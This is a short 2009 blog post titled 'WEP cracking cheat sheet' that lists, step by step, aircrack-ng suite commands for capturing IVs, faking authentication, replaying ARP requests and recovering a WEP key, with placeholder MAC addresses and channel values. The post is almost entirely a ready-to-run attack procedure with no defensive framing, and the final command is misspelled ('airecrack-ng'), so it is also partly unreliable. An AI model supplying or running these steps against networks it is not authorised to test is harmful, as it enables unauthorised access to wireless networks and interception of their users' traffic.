Wednesday, January 14, 2009

WEP cracking cheat sheet

Cracking WEP
------------------------------------------------------
MAC address of wireless card = 11:11:11:11:11:11
BSSID (MAC addr of access point) = 22:22:22:22:22:22
ESSID (wireless network name) = essid
Channel = 9
wireless interface = ath0
-------------------------------------------------------------------------

$airmon-ng stop ath0
$airmon-ng start wifi0 9

#Capturing IV's
$airodump-ng -c 9 --bssid 22:22:22:22:22:22 -w output ath0

#Fake Authentication
$aireplay-ng -1 0 -e essid -a 22:22:22:22:22:22 -h 11:11:11:11:11:11 ath0
or
$aireplay-ng -1 6000 -o 1 -q 10 -e essid -a 22:22:22:22:22:22 -h 11:11:11:11:11:11 ath0

#ARP request replay mode
$aireplay-ng -3 -b 22:22:22:22:22:22 -h 11:11:11:11:11:11 ath0

#Cracking the WEP key
$airecrack-ng -2 -b 22:22:22:22:22:22 output*.cap

No comments:

Post a Comment